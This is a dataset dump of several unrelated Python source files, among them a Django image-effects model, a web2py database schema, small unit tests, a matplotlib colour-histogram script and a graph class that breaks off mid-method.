self.LineEdit_1.setAlignment(Qt.AlignCenter)\n        self.LineEdit_2.setAlignment(Qt.AlignCenter)\n        self.LineEdit_1.setStyleSheet(\"color:black;font:25px;background:transparent;border-width:0;border-style:outset\")\n        
self.LineEdit_2.setStyleSheet(\"color:black;font:25px;background:transparent;border-width:0;border-style:outset\")\n        self.LineEdit_1.setReadOnly(True)\n        self.LineEdit_2.setReadOnly(True)\n        self.LineEdit_1.setText(\"如果在使用过程中遇到问题或着有改进的建议,可通过以下方式联系我们\")\n        self.LineEdit_2.setText(\"425185455@qq.com\")\n\n\n        self.frame.setStyleSheet('''\n            QPushButton{border:none;color:white;font-size:30px}\n            QPushButton:hover{\n                border-left:4px solid white;\n                font-size:35px;\n                background:#4affa5;\n                border-top:1px solid white;\n                border-bottom:1px solid white;\n                border-left:1px solid white;\n                border-top-left-radius:10px;\n                border-bottom-left-radius:10px;\n                border-top-right-radius:10px;\n                border-bottom-right-radius:10px;\n            }\n            \n            QWidget#Frame{\n                border-image:url(../images/screen4.jpg);\n                border-top:1px solid white;\n                border-bottom:1px solid white;\n                border-right:1px solid white;\n                border-top-left-radius:10px;\n                border-bottom-left-radius:10px;\n                border-top-right-radius:10px;\n                border-bottom-right-radius:10px;\n            }\n        ''')","sub_path":"手势识别/pyqt/update/ContactUs.py","file_name":"ContactUs.py","file_ext":"py","file_size_in_byte":2727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"172387834","text":"import urllib\nfrom models import Audio\nimport requests\nfrom api.services.service import Service\n\n\nclass Vkontakte(Service):\n    def _search(self, **kwargs):\n        data = requests.get(\n            'https://api.vk.com/method/audio.search?' + urllib.parse.urlencode({\n                'q': kwargs.get('query', ''),\n                'auto_complete': 1,\n                'sort': 0,\n                'count': self.limit,\n                'offset': kwargs.get('offset', 0),\n                'access_token': self.access_token,\n            })\n        )\n\n        for audio in data.json().get('response', [])[1:]:\n            url = urllib.parse.urlparse(audio.get('url'))\n            if '/audios/' not in url[2]:\n                yield Audio(**audio)","sub_path":"server/api/services/vkontakte/vkontakte.py","file_name":"vkontakte.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"542652016","text":"from django.db import models\nfrom django.core.exceptions import ValidationError\nfrom django.conf import settings\nfrom PIL import Image,ImageEnhance,ImageDraw,ExifTags # PIL; ExifTags is used for orientation handling in apply_effects\nimport os,re\n\ndef get_upload_file_name(instance,filename):\n    return \"image_styles/%s/%s\" % (instance.style.name,filename)\n\n\nclass Style(models.Model):\n    name = models.SlugField(max_length=127,unique=True)\n    \n    def delete_images(self):\n        ImageStyle.objects.filter(style=self).delete()\n\n    def get_effects(self):\n        effects = []\n        effect_objects = [Crop,Enhance,Resize,Rotate,Scale,SmartScale,RoundCorners]\n        for effect_object in effect_objects:\n            es = effect_object.objects.filter(style=self)\n            for e in es:\n                re_type = re.match(r\"<class '.*\\\\.(\\\\w+)'>\",str(type(e))) # e.g. \"<class 'image_styles.models.Crop'>\" -> 'Crop'\n                if re_type and len(re_type.groups()) == 1:\n                    name = re_type.group(1)\n                else:\n                    name = ''\n                effects.append({\n                    'weight':e.weight,\n                    'object':e,\n                    'name':name,\n                })\n        effects = sorted(effects, key=lambda k: k['weight'])\n        return effects\n\n    def __str__(self):\n        return '%d: %s' % (self.id,self.name)\n\n    class Meta:\n        ordering = ['id']\n\nclass ImageStyle(models.Model):\n    name = models.CharField(max_length=511)\n    style = models.ForeignKey(Style,on_delete=models.CASCADE)\n    image = models.ImageField(upload_to=get_upload_file_name,null=True,blank=True)\n    def __str__(self):\n        return \"%s - %s\" % (self.style.name,self.name)\n\n    def apply_effects(self,effects):\n        orig = Image.open(os.path.join(settings.MEDIA_ROOT,self.name))\n        if orig.mode != 'RGBA':\n            orig = 
orig.convert('RGBA')\n\n # Fix orientation\n orientation = False\n try:\n exif=dict((ExifTags.TAGS[k], v) for k, v in orig._getexif().items() if k in ExifTags.TAGS)\n if exif.get('Orientation') == 8:\n orig=orig.rotate(90, expand=True)\n orientation = True\n if exif.get('Orientation') == 6:\n orig=orig.rotate(270, expand=True)\n orientation = True\n except AttributeError:\n pass # No EXIF\n\n # Handle transparency\n if orientation:\n size = orig.size\n else:\n size = orig.size\n im = Image.new('RGBA', orig.size, (0,0,0,0))\n im.paste(orig)\n\n for effect in effects:\n if type(effect['object']) is Crop:\n w, h = im.size\n if effect['object'].anchor == 1:\n box = (0,0,effect['object'].width,effect['object'].height)\n elif effect['object'].anchor == 2:\n box = ((w/2)-(effect['object'].width/2),0,(effect['object'].width/2)+(w/2),effect['object'].height)\n elif effect['object'].anchor == 3:\n box = (w-effect['object'].width,0,w,effect['object'].height)\n elif effect['object'].anchor == 4:\n box = (0,(h/2)-(effect['object'].height/2),effect['object'].width,(effect['object'].height/2)+(h/2))\n elif effect['object'].anchor == 5:\n box = ((w/2)-(effect['object'].width/2),(h/2)-(effect['object'].height/2),(effect['object'].width/2)+(w/2),(effect['object'].height/2)+(h/2))\n elif effect['object'].anchor == 6:\n box = (w-effect['object'].width,(h/2)-(effect['object'].height/2),w,(effect['object'].height/2)+(h/2))\n elif effect['object'].anchor == 7:\n box = (0,h-effect['object'].height,effect['object'].width,h)\n elif effect['object'].anchor == 8:\n box = ((w/2)-(effect['object'].width/2),h-effect['object'].height,(effect['object'].width/2)+(w/2),h)\n elif effect['object'].anchor == 9:\n box = (w-effect['object'].width,h-effect['object'].height,w,h)\n im = im.crop(box)\n elif type(effect['object']) is Enhance:\n \n if effect['object'].color > 100:\n color = 2\n elif effect['object'].color < -100:\n color = 0\n else:\n color = float(effect['object'].color+100)/100\n converter = ImageEnhance.Color(im)\n im = converter.enhance(color)\n \n if effect['object'].contrast > 100:\n contrast = 2\n elif effect['object'].contrast < -100:\n contrast = 0\n else:\n contrast = float(effect['object'].contrast+100)/100\n converter = ImageEnhance.Contrast(im)\n im = converter.enhance(contrast)\n \n if effect['object'].brightness > 100:\n brightness = 2\n elif effect['object'].brightness < -100:\n brightness = 0\n else:\n brightness = float(effect['object'].brightness+100)/100\n converter = ImageEnhance.Brightness(im)\n im = converter.enhance(brightness)\n \n if effect['object'].sharpness > 100:\n sharpness = 2\n elif effect['object'].sharpness < -100:\n sharpness = 0\n else:\n sharpness = float(effect['object'].sharpness+100)/100\n \n converter = ImageEnhance.Sharpness(im)\n im = converter.enhance(sharpness)\n \n\n elif type(effect['object']) is Resize:\n im = im.resize((effect['object'].width,effect['object'].height))\n elif type(effect['object']) is Rotate:\n im = im.rotate(-effect['object'].angle)\n elif type(effect['object']) is Scale:\n w, h = im.size\n if effect['object'].height is None:\n width = effect['object'].width\n height = int(float(h)/w*width)\n elif effect['object'].width is None:\n height = effect['object'].height\n width = int(float(w)/h*height)\n else:\n height = effect['object'].height\n width = effect['object'].width\n\n if effect['object'].allow_upscale:\n im = im.resize((width,height),effect['object'].mode)\n else:\n if w > width and h > height:\n im = 
im.resize((width,height),effect['object'].mode)\n elif type(effect['object']) is SmartScale:\n w, h = im.size\n im_prop = float(h)/float(w)\n\n if im_prop > 1.0:\n width = effect['object'].width\n height = int(float(h)/w*width)\n else:\n height = effect['object'].height\n width = int(float(w)/h*height)\n\n if effect['object'].allow_upscale:\n im = im.resize((width,height),effect['object'].mode)\n else:\n if w > width and h > height:\n im = im.resize((width,height),effect['object'].mode)\n elif type(effect['object']) is RoundCorners:\n circle = Image.new('L', (effect['object'].radius * 2, effect['object'].radius * 2), 0)\n draw = ImageDraw.Draw(circle)\n draw.ellipse((0, 0, effect['object'].radius * 2, effect['object'].radius * 2), fill=255)\n alpha = Image.new('L', im.size, \"white\")\n w, h = im.size\n alpha.paste(circle.crop((0, 0, effect['object'].radius, effect['object'].radius)), (0, 0))\n alpha.paste(circle.crop((0, effect['object'].radius, effect['object'].radius, effect['object'].radius * 2)), (0, h - effect['object'].radius))\n alpha.paste(circle.crop((effect['object'].radius, 0, effect['object'].radius * 2, effect['object'].radius)), (w - effect['object'].radius, 0))\n alpha.paste(circle.crop((effect['object'].radius, effect['object'].radius, effect['object'].radius * 2, effect['object'].radius * 2)), (w - effect['object'].radius, h - effect['object'].radius))\n im.putalpha(alpha)\n \n try:\n im.save(self.image.path)\n except IOError:\n # Not the most elegant way to handle RGBA jpgs, but works\n background = Image.new(\"RGB\", im.size, (255, 255, 255))\n background.paste(im, mask=im.split()[3])\n im = background\n im.save(self.image.path)\n\n \n def save(self,*args,**kwargs):\n if self.id is None:\n new_image = get_upload_file_name(self,self.name)\n if not os.path.exists(os.path.dirname(os.path.join(settings.MEDIA_ROOT,new_image))):\n os.makedirs(os.path.dirname(os.path.join(settings.MEDIA_ROOT,new_image)))\n self.image = new_image\n self.apply_effects(self.style.get_effects())\n return super(ImageStyle,self).save(*args,**kwargs)\n\nclass Crop(models.Model):\n ANCHORS = (\n (1,'top-left'),\n (2,'top-center'),\n (3,'top-right'),\n (4,'middle-left'),\n (5,'middle-center'),\n (6,'middle-right'),\n (7,'bottom-left'),\n (8,'bottom-center'),\n (9,'bottom-right'),\n )\n width = models.IntegerField()\n height = models.IntegerField()\n anchor = models.IntegerField(choices=ANCHORS,default=5)\n style = models.ForeignKey(Style,on_delete=models.CASCADE)\n weight = models.IntegerField(default=0)\n \n def save(self,*args,**kwargs):\n if not self.id and self.weight == 0:\n es = self.style.get_effects()[::-1] \n if len(es) is not 0:\n self.weight = es[0]['weight']+1\n sv = super(Crop,self).save(*args,**kwargs)\n self.style.delete_images()\n return sv\n \n def delete(self,*args,**kwargs):\n self.style.delete_images()\n super(Crop,self).delete(*args,**kwargs)\n\n def __unicode__(self):\n return self.style.name \n\n\nclass Enhance(models.Model):\n CONTRASTS = zip( range(-100,101), range(-100,101) )\n SHARPNESSES = zip( range(-100,101), range(-100,101) )\n BRIGHTNESSES = zip( range(-100,101), range(-100,101) )\n COLORS = zip( range(-100,101), range(-100,101) )\n contrast = models.IntegerField(choices=CONTRASTS,default=0)\n brightness = models.IntegerField(choices=BRIGHTNESSES,default=0)\n color = models.IntegerField(choices=COLORS,default=0)\n sharpness = models.IntegerField(choices=SHARPNESSES,default=0)\n\n style = models.ForeignKey(Style,on_delete=models.CASCADE)\n weight = 
models.IntegerField(default=0)\n \n def save(self,*args,**kwargs):\n if not self.id and self.weight == 0:\n es = self.style.get_effects()[::-1]\n if len(es) is not 0:\n self.weight = es[0]['weight']+1\n sv = super(Enhance,self).save(*args,**kwargs)\n self.style.delete_images()\n return sv\n \n def delete(self,*args,**kwargs):\n self.style.delete_images()\n super(Enhance,self).delete(*args,**kwargs)\n\n def __unicode__(self):\n return self.style.name \n\nclass Resize(models.Model):\n width = models.IntegerField()\n height = models.IntegerField()\n\n style = models.ForeignKey(Style,on_delete=models.CASCADE)\n weight = models.IntegerField(default=0)\n\n def save(self,*args,**kwargs):\n if not self.id and self.weight == 0:\n es = self.style.get_effects()[::-1]\n if len(es) is not 0:\n self.weight = es[0]['weight']+1\n sv = super(Resize,self).save(*args,**kwargs)\n self.style.delete_images()\n return sv\n \n def delete(self,*args,**kwargs):\n self.style.delete_images()\n super(Resize,self).delete(*args,**kwargs)\n\n def __unicode__(self):\n return self.style.name \n\nclass RoundCorners(models.Model):\n radius = models.IntegerField()\n style = models.ForeignKey(Style,on_delete=models.CASCADE)\n weight = models.IntegerField(default=0)\n\n def save(self,*args,**kwargs):\n if not self.id and self.weight == 0:\n es = self.style.get_effects()[::-1]\n if len(es) is not 0:\n self.weight = es[0]['weight']+1\n sv = super(RoundCorners,self).save(*args,**kwargs)\n self.style.delete_images()\n return sv\n \n def delete(self,*args,**kwargs):\n self.style.delete_images()\n super(RoundCorners,self).delete(*args,**kwargs)\n\n def __unicode__(self):\n return self.style.name \n\nclass Rotate(models.Model):\n ANGLES = zip( range(90,360,90), range(90,360,90) )\n angle = models.IntegerField(choices=ANGLES,default=0)\n\n style = models.ForeignKey(Style,on_delete=models.CASCADE)\n weight = models.IntegerField(default=0)\n\n def save(self,*args,**kwargs):\n if not self.id and self.weight == 0:\n es = self.style.get_effects()[::-1]\n if len(es) is not 0:\n self.weight = es[0]['weight']+1\n sv = super(Rotate,self).save(*args,**kwargs)\n self.style.delete_images()\n return sv\n\n def delete(self,*args,**kwargs):\n self.style.delete_images()\n super(Rotate,self).delete(*args,**kwargs)\n\n def __unicode__(self):\n return self.style.name \n\nclass Scale(models.Model):\n MODES = (\n (Image.NEAREST,'Nearest'),\n (Image.ANTIALIAS,'Antialias'),\n (Image.BILINEAR,'Bilinear'),\n (Image.BICUBIC,'Bicubic'),\n )\n mode = models.PositiveSmallIntegerField(choices=MODES,default=1)\n width = models.IntegerField(blank=True,null=True)\n height = models.IntegerField(blank=True,null=True)\n allow_upscale = models.BooleanField(default=True)\n\n style = models.ForeignKey(Style,on_delete=models.CASCADE)\n weight = models.IntegerField(default=0)\n\n def save(self,*args,**kwargs):\n if not self.id and self.weight == 0:\n es = self.style.get_effects()[::-1]\n if len(es) is not 0:\n self.weight = es[0]['weight']+1\n sv = super(Scale,self).save(*args,**kwargs)\n self.style.delete_images()\n return sv\n\n def delete(self,*args,**kwargs):\n self.style.delete_images()\n super(Scale,self).delete(*args,**kwargs)\n\n def __unicode__(self):\n return self.style.name \n\n\n\nclass SmartScale(models.Model):\n MODES = (\n (Image.NEAREST,'Nearest'),\n (Image.ANTIALIAS,'Antialias'),\n (Image.BILINEAR,'Bilinear'),\n (Image.BICUBIC,'Bicubic'),\n )\n mode = models.PositiveSmallIntegerField(choices=MODES,default=1)\n width = models.IntegerField()\n height = 
models.IntegerField()\n allow_upscale = models.BooleanField(default=True)\n\n style = models.ForeignKey(Style,on_delete=models.CASCADE)\n weight = models.IntegerField(default=0)\n\n def save(self,*args,**kwargs):\n if not self.id and self.weight == 0:\n es = self.style.get_effects()[::-1]\n if len(es) is not 0:\n self.weight = es[0]['weight']+1\n sv = super(SmartScale,self).save(*args,**kwargs)\n self.style.delete_images()\n return sv\n\n def delete(self,*args,**kwargs):\n self.style.delete_images()\n super(SmartScale,self).delete(*args,**kwargs)\n\n def __unicode__(self):\n return self.style.name \n\n","sub_path":"image_styles/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":15623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"214098881","text":"import json\nimport openpyxl\nimport yaml\n\nwb = openpyxl.load_workbook(\"RIT-DuPont.xlsx\")\n\nws = wb.worksheets[0]\ndv = [ws[f\"A{k}\"].value for k in range(3, 315)]\n\nwhite = [ws[\"B3\"].value, ws[\"C3\"].value, ws[\"D3\"].value]\n\npairs = [\n [\n [ws[f\"E{k}\"].value, ws[f\"F{k}\"].value, ws[f\"G{k}\"].value],\n [ws[f\"H{k}\"].value, ws[f\"I{k}\"].value, ws[f\"J{k}\"].value],\n ]\n for k in range(3, 315)\n]\n\nd = {\"reference_white\": white, \"dv\": dv, \"pairs\": pairs}\nwith open(\"rit-dupont.yaml\", \"w\") as f:\n yaml.dump(d, f)\n\nwith open(\"rit-dupont.json\", \"w\") as f:\n json.dump(d, f, indent=2)\n","sub_path":"rit-dupont/melgosa/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"517857629","text":"from collections import namedtuple\nimport csv\nimport os\nimport unittest\nimport logging\n\nimport pbsmrtpipe.tools.gather as G\n\nfrom base import get_temp_file, get_temp_dir\n\nlog = logging.getLogger(__name__)\n\n\nclass Record(object):\n def __init__(self, idx, alpha):\n self.idx = idx\n self.alpha = alpha\n\n def to_dict(self):\n return dict(id=self.idx, alpha=self.alpha)\n\n\ndef _to_n_records(nrecords):\n for i in xrange(nrecords):\n r = Record(i, 90)\n yield r\n\n\ndef _write_records_to_csv(records, output_csv):\n fields = records[0].to_dict().keys()\n with open(output_csv, 'w') as w:\n writer = csv.DictWriter(w, fieldnames=fields)\n writer.writeheader()\n writer.writerows([r.to_dict() for r in records])\n\n\nclass TestCsvGather(unittest.TestCase):\n\n def test_smoke(self):\n t = get_temp_file(suffix=\"-records-1.csv\")\n _write_records_to_csv(list(_to_n_records(100)), t)\n\n t2 = get_temp_file(suffix=\"-records-2.csv\")\n _write_records_to_csv(list(_to_n_records(57)), t2)\n\n tg = get_temp_file(suffix=\"records-gather.csv\")\n G.gather_csv([t, t2], tg)\n\n nrecords = 0\n with open(tg, 'r') as r:\n reader = csv.DictReader(r)\n log.debug(reader.fieldnames)\n for _ in reader:\n nrecords += 1\n\n self.assertEqual(nrecords, 157)","sub_path":"pbsmrtpipe/tests/test_tools_gather.py","file_name":"test_tools_gather.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"306318752","text":"from unittest import TestCase\n\nfrom neocore.bin import cli\n\n\nclass CliTestCase(TestCase):\n def test_address_to_scripthash(self):\n address = \"AK2nJJpJr6o664CWJKi1QRXjqeic2zRp8y\"\n scripthash = cli.address_to_scripthash(address)\n self.assertEqual(scripthash, b'#\\xba\\'\\x03\\xc52c\\xe8\\xd6\\xe5\"\\xdc2 39\\xdc\\xd8\\xee\\xe9')\n\n address = 
\"AK2nJJpJr6o664CWJKi1QRXjqeic2zRpxx\"\n with self.assertRaises(cli.ConversionError):\n scripthash = cli.address_to_scripthash(address)\n\n def test_scripthash_to_address(self):\n scripthash = \"0xe9eed8dc39332032dc22e5d6e86332c50327ba23\"\n address = cli.scripthash_to_address(scripthash)\n self.assertEqual(address, \"AK2nJJpJr6o664CWJKi1QRXjqeic2zRp8y\")\n\n scripthash = \"e9eed8dc39332032dc22e5d6e86332c50327ba23\"\n address = cli.scripthash_to_address(scripthash)\n self.assertEqual(address, \"AK2nJJpJr6o664CWJKi1QRXjqeic2zRp8y\")\n\n scripthash = \"0xe9eed8dc39332032dc22e5d6e86332c50327baxx\"\n with self.assertRaises(cli.ConversionError):\n address = cli.scripthash_to_address(scripthash)\n","sub_path":"tests/test_cli.py","file_name":"test_cli.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"602986890","text":"\"\"\"\nHere we register all optimizers with bespokefit.\n\"\"\"\nfrom typing import Dict, List, Union\n\nfrom openff.bespokefit.exceptions import OptimizerError\nfrom openff.bespokefit.optimizers.forcebalance import ForceBalanceOptimizer\nfrom openff.bespokefit.optimizers.model import Optimizer\n\noptimizers: Dict[str, Optimizer] = {}\n\n\ndef register_optimizer(optimizer: Optimizer, replace: bool = False) -> None:\n \"\"\"\n Register a new valid optimizer with bespokefit.\n\n Parameters\n ----------\n optimizer: Optimizer\n The optimizer class that should be registered.\n replace: bool\n If the optimizer should replace another optimizer registered with the same name.\n\n Raises\n ------\n OptimizerError\n If the optimizer is already registered or if the optimizer object is not compatible.\n \"\"\"\n\n if issubclass(type(optimizer), Optimizer):\n optimizer_name = optimizer.optimizer_name.lower()\n if optimizer_name not in optimizers or (\n optimizer_name in optimizers and replace\n ):\n optimizers[optimizer_name] = optimizer\n else:\n raise OptimizerError(\n f\"An optimizer is already registered under the name {optimizer.optimizer_name}, to replace this please use the `replace=True` flag.\"\n )\n else:\n raise OptimizerError(\n f\"The optimizer {optimizer} could not be registered it must be a subclass of openff.bespokefit.optimzers.Optimizer\"\n )\n\n\ndef deregister_optimizer(optimizer: Union[Optimizer, str]) -> None:\n \"\"\"\n Remove an optimizer from the list of valid optimizers.\n\n Parameters\n ----------\n optimizer: Union[Optimizer, str]\n The optimizer class or name of the class that should be removed.\n \"\"\"\n\n try:\n optimizer_name = optimizer.optimizer_name.lower()\n except AttributeError:\n optimizer_name = optimizer.lower()\n\n opt = optimizers.pop(optimizer_name, None)\n if opt is None:\n raise OptimizerError(\n f\"The optimizer {optimizer} was not registered with bespokefit.\"\n )\n\n\ndef get_optimizer(optimizer_name: str, **kwargs) -> Optimizer:\n \"\"\"\n Get the optimizer class from the list of registered optimizers in bespokefit by name.\n\n Parameters\n ----------\n optimizer_name: str\n The `optimizer_name` attribute of the optimizer that should be fetched.\n kwargs: dict\n Any kwargs that should be passed into the optimizer.\n\n Returns\n -------\n Optimizer\n The requested optimizer matching the given optimizer name.\n \"\"\"\n\n opt = optimizers.get(optimizer_name.lower(), None)\n if opt is None:\n raise OptimizerError(\n f\"The optimizer {optimizer_name} was not registered with bespokefit.\"\n )\n\n if kwargs:\n return opt.parse_obj(kwargs)\n else:\n 
return opt\n\n\ndef list_optimizers() -> List[str]:\n \"\"\"\n Get the list of registered optimizers with bespokefit.\n\n Returns\n -------\n List[str]\n A list of the optimizer classes registered.\n \"\"\"\n\n return list(optimizers.keys())\n\n\n# register the built in optimizers\nregister_optimizer(ForceBalanceOptimizer())\n","sub_path":"openff/bespokefit/optimizers/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"361292068","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt \n\ndef RGB(img):\n b, g, r = cv2.split(img)\n x = b.sum()\n y = g.sum()\n z = r.sum()\n total = x+y+z\n rate = [float(x)/total, float(y)/total, float(z)/total]\n return rate\n\ndef draw(data, name):\n global count\n plt.figure(count)\n colors = ['b', 'g', 'r']\n bgr = [1, 2, 3] \n a=plt.bar(bgr, data, 0.5, color=colors, linewidth=0, align='center')\n plt.xticks(bgr, colors)\n plt.title(name)\n for i in a:\n #print i\n xloc = i.get_x()\n yloc = i.get_height()\n #print xloc, yloc\n plt.text(xloc+0.15,yloc*1.01,(\"%.3f\"%yloc))\n count += 1\n\nN = 2\ncount = 0\nfor i in range(N):\n plt.figure(i)\nimg1 = cv2.imread(\"img1.png\",cv2.IMREAD_COLOR)\ndata1 = RGB(img1)\ndraw(data1,\"color histogram for img1\")\nimg2 = cv2.imread(\"img2.png\",cv2.IMREAD_COLOR)\ndata2 = RGB(img2)\ndraw(data2,\"color histogram for img2\")\nplt.show()\n\n","sub_path":"Exp7/Exp7/images/颜色直方图.py","file_name":"颜色直方图.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"430637110","text":"# -*- coding: utf-8 -*-\n\n#########################################################################\n## This scaffolding model makes your app work on Google App Engine too\n## File is released under public domain and you can use without limitations\n#########################################################################\n\n## if SSL/HTTPS is properly configured and you want all HTTP requests to\n## be redirected to HTTPS, uncomment the line below:\n# request.requires_https()\nimport uuid\nimport datetime\ndb = DAL('sqlite://storage.sqlite',pool_size=1,check_reserved=['all'])\n\n## by default give a view/generic.extension to all actions from localhost\n## none otherwise. a pattern can be 'controller/function.extension'\nresponse.generic_patterns = ['*'] if request.is_local else []\n## (optional) optimize handling of static files\n# response.optimize_css = 'concat,minify,inline'\n# response.optimize_js = 'concat,minify,inline'\n\n#########################################################################\n## Here is sample code if you need for\n## - email capabilities\n## - authentication (registration, login, logout, ... 
)\n## - authorization (role based authorization)\n## - services (xml, csv, json, xmlrpc, jsonrpc, amf, rss)\n## - old style crud actions\n## (more options discussed in gluon/tools.py)\n#########################################################################\n\nfrom gluon.tools import Auth, Crud, Service, PluginManager, prettydate\nauth = Auth(db)\nauth.settings.allow_basic_login = True\nauth.settings.extra_fields['auth_user']=[Field(\"uuid\", \"string\", length = 64, readable=False, writable=False, default=lambda: uuid.uuid4() )]\ncrud, service, plugins = Crud(db), Service(), PluginManager()\n\n## create all tables needed by auth if not custom tables\nauth.define_tables(username=False, signature=False)\nauth.settings.actions_disabled.append('register')\n## configure email\nmail = auth.settings.mailer\nmail.settings.server = 'logging' or 'smtp.gmail.com:587'\nmail.settings.sender = 'admin@localhost'\nmail.settings.login = 'username:password'\n\n## configure auth policy\n\nauth.settings.registration_requires_verification = False\nauth.settings.registration_requires_approval = True\nauth.settings.reset_password_requires_verification = True\n\n## if you need to use OpenID, Facebook, MySpace, Twitter, Linkedin, etc.\n## register with janrain.com, write your domain:api_key in private/janrain.key\nfrom gluon.contrib.login_methods.rpx_account import use_janrain\nuse_janrain(auth, filename='private/janrain.key')\n\n#########################################################################\n## Define your tables below (or better in another model file) for example\n##\n## >>> db.define_table('mytable',Field('myfield','string'))\n##\n## Fields can be 'string','text','password','integer','double','boolean'\n## 'date','time','datetime','blob','upload', 'reference TABLENAME'\n## There is an implicit 'id integer autoincrement' field\n## Consult manual for more options, validators, etc.\n##\n## More API examples for controllers:\n##\n## >>> db.mytable.insert(myfield='value')\n## >>> rows=db(db.mytable.myfield=='value').select(db.mytable.ALL)\n## >>> for row in rows: print row.id, row.myfield\n#########################################################################\n\n## after defining tables, uncomment below to enable auditing\n# auth.enable_record_versioning(db)\n\ndb.define_table('groups',\n Field('uuid', readable=False, writable=False, default = lambda: uuid.uuid4()),\n Field('created', 'datetime', writable=False, default=datetime.datetime.utcnow()),\n Field('modified', 'datetime', writable=False, default=datetime.datetime.utcnow()),\n Field(\"user_uuid\", 'string', requires=IS_IN_DB(db, db.auth_user.uuid)),\n Field('name', 'string', requires=IS_NOT_EMPTY())\n )\n\n\ndb.define_table('albums',\n Field('uuid', readable=False, writable=False, default = lambda: uuid.uuid4()),\n Field('created', 'datetime', writable=False, default=datetime.datetime.utcnow()),\n Field('modified', 'datetime', writable=False, default=datetime.datetime.utcnow()), \n Field(\"user_uuid\", 'string', requires=IS_IN_DB(db, db.auth_user.uuid), writable=False),\n Field('name', 'string', unique=True, requires=IS_NOT_EMPTY()),\n Field('groups', 'string'))\n\n\n\n\ndb.define_table('images',\n Field('uuid', readable=False, writable=False, default = lambda: uuid.uuid4()),\n Field('created', 'datetime', writable=False, default=datetime.datetime.utcnow()),\n Field('modified', 'datetime', writable=False, readable=False, default=datetime.datetime.utcnow()),\n Field('album_uuid', 'string', length=64, requires=IS_IN_DB(db, db.albums.uuid, 
'%(name)s', zero=None, orderby=db.albums.name), label=T('Album')),\n Field('filename', 'upload', requires=IS_IMAGE(extensions=('jpeg', 'png','jpg'))),\n Field('title', 'string', length=72),\n Field('body', 'text', length=1024)\n )\n \n\ndb.define_table('comments',\n Field('uuid', readable=False, writable=False, default = lambda: uuid.uuid4()),\n Field('created', 'datetime', writable=False, default=datetime.datetime.utcnow()),\n Field('modified', 'datetime', writable=False, default=datetime.datetime.utcnow()), \n Field('image_uuid', 'string', length=64, readable=False, writable=False, requires=IS_IN_DB(db, db.images.uuid))\n )\n\ndb.define_table('api_keys',\n Field('uuid', readable=False, writable=False, default = lambda: uuid.uuid4()),\n Field('created', 'datetime', writable=False, default=datetime.datetime.utcnow()),\n Field('modified', 'datetime', writable=False, default=datetime.datetime.utcnow()), \n Field('user_uuid', 'string', length=64, readable=False, writable=False, requires=IS_IN_DB(db, db.auth_user.uuid)),\n Field('api_key','string', length = 32)\n )\n\n\n\ndef upload_validate(form):\n filename=form.vars.filename.filename.lower()\n form.vars.filename.filename=filename\n","sub_path":"models/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":6288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"27637743","text":"#FUNCTIONS\n\ndef add(x,y):\n return x + y \n\nprint(add(5,10))\n\nanswer = add(100,20)\nprint(answer)\n\ndef rev(text):\n return text[::-1]\n\nprint(rev(\"pen\"))\n\n\n#SCOPE\n\n#global scope\na = 250\n\ndef f1 ():\n #a = 100 #local\n #b = a + 10 #uses global a when above line is commented out\n #print(b)\n global a\n a = 100 # changes global value which overwrites the a = 250\n print(a)\n\n\ndef f2 ():\n a = 50 #local\n print(a)\n\nf1()\nf2() \nprint(a) #global a \n\n\na = [1, 2, 3]\n\ndef f1():\n a[0] = 5 #changes global value to first item in list a\n print(a)\n\ndef f2():\n a = 50\n print(a)\n\nf1()\nf2()\nprint(a)\n\n\n# def about(name, age, likes):\n# sentence = \"Meet {}! They are {} years old, and they like {}.\".format(name, age, likes)\n# return sentence\n\n# print(about(\"Jack\", 23, \"Python\"))\n\n# print(about(age = 35, name = \"John\", likes = \"Java\"))\n\n\ndef about(name = \"Eric\", age = 33, likes = \"Python\"):#creates defauly parameter and they must go at the end\n sentence = \"Meet {}! 
They are {} years old, and they like {}.\".format(name, age, likes)\n    return sentence\n\nprint(about(\"Jack\", 23))\nprint(about())\nprint(about(\"Tim\"))\nprint(about(likes = \"Surfing\"))\n","sub_path":"Python_Bible_Functions_and_Scope.py","file_name":"Python_Bible_Functions_and_Scope.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"312288576","text":"import math\n\nINFINITY = math.inf\n\n\nclass Grafo:\n    listaDeAdjacencias = {}\n    vertices_abertos = []\n    vertices_fechados = []\n    rot = []\n    dt = []\n\n    def __init__(self, n, m, b):\n        self.__n = n\n        self.__m = m\n        self.__b = b\n\n    def get_n(self):\n        return self.__n\n\n    def get_m(self):\n        return self.__m\n\n    def get_b(self):\n        return self.__b\n\n    def fecha_o_vertice(self, vrt):\n        self.vertices_abertos[vrt] = False\n\n    # add the vertex to the closed set\n    def adiciona_vertice_aos_fechados(self, vrt):\n        self.vertices_fechados.append(vrt)\n\n    def vertice_esta_aberto(self, c):\n        return self.vertices_abertos[c]\n\n    def adionar_aresta(self, aresta):\n        origem = aresta.get_origem()\n        destino = aresta.get_destino()\n        peso = aresta.get_peso()\n        adj_nova = [(destino, peso)]\n        if origem in self.listaDeAdjacencias:\n            # fetch the adjacencies already stored\n            adj_existentes = self.listaDeAdjacencias.get(origem) # for the origin\n            